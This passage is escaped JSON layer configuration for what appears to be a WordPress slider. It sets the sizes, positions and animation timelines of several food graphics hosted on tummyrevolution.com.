\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Lime\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-3.png\",\"imageId\":2540},\"size\":{\"width\":{\"d\":{\"v\":\"497px\",\"e\":true},\"n\":{\"v\":\"497px\",\"e\":true},\"t\":{\"v\":\"306px\",\"e\":true},\"m\":{\"v\":\"184px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"509px\",\"e\":true},\"n\":{\"v\":\"509px\",\"e\":true},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"188px\",\"e\":true}},\"originalWidth\":439,\"originalHeight\":484,\"aspectRatio\":{\"d\":{\"v\":0.9070247933884298},\"n\":{\"v\":0.9070247933884298},\"t\":{\"v\":0.9070247933884298},\"m\":{\"v\":0.9070247933884298}}},\"position\":{\"x\":{\"d\":{\"v\":\"160px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-150px\",\"e\":true},\"n\":{\"v\":\"-180px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"9px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":290},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1920,\"start\":290,\"startRelative\":290},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1920,\"start\":290,\"startRelative\":290},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-110,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Paprika\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-5.png\",\"imageId\":2542},\"size\":{\"width\":{\"d\":{\"v\":\"255px\",\"e\":true},\"n\":{\"v\":\"216px\",\"e\":true},\"t\":{\"v\":\"246px\",\"e\":true},\"m\":{\"v\":\"138px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"350px\",\"e\":true},\"n\":{\"v\":\"296px\",\"e\":true},\"t\":{\"v\":\"336px\",\"e\":true},\"m\":{\"v\":\"189px\",\"e\":true}},\"originalWidth\":390,\"originalHeight\":359,\"aspectRatio\":{\"d\":{\"v\":1.0863509749303621},\"n\":{\"v\":1.0863509749303621},\"t\":{\"v\":1.0863509749303621},\"m\":{\"v\":1.0863509749303621}}},\"position\":{\"x\":{\"d\":{\"v\":\"-5px\",\"e\":true},\"n\":{\"v\":\"-93px\",\"e\":true},\"t\":{\"v\":\"2px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-120px\",\"e\":true},\"n\":{\"v\":\"33px\",\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"v\":\"51px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2020,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2020,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-260,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Image 6\",\"alias\":\"Image 6\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/shutterstock_677295580bc.png\",\"imageId\":3732},\"size\":{\"width\":{\"d\":{\"v\":\"669px\",\"e\":true},\"n\":{\"v\":\"568px\",\"e\":true},\"t\":{\"v\":\"378\",\"e\":true},\"m\":{\"v\":\"236\",\"e\":true}},\"height\":{\"d\":{\"v\":\"707px\",\"e\":true},\"n\":{\"v\":\"600px\",\"e\":true},\"t\":{\"v\":\"400px\",\"e\":true},\"m\":{\"v\":\"250px\",\"e\":true}},\"originalWidth\":543,\"originalHeight\":574,\"aspectRatio\":{\"d\":{\"v\":0.945993031358885},\"n\":{\"v\":0.945993031358885},\"t\":{\"v\":0.945993031358885},\"m\":{\"v\":0.945993031358885}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"40px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":380},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1840,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1840,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-120,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Image 7\",\"alias\":\"Image 7\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic6.png\",\"imageId\":1083},\"size\":{\"width\":{\"d\":{\"v\":\"441px\",\"e\":true},\"n\":{\"v\":\"441px\"},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"357px\",\"e\":true},\"n\":{\"v\":\"357px\"},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"174px\",\"e\":true}},\"originalWidth\":441,\"originalHeight\":357,\"aspectRatio\":{\"d\":{\"v\":1.2352941176470589},\"n\":{\"v\":1.2352941176470589},\"t\":{\"v\":1.2352941176470589},\"m\":{\"v\":1.2352941176470589}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"40px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":460},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"Image 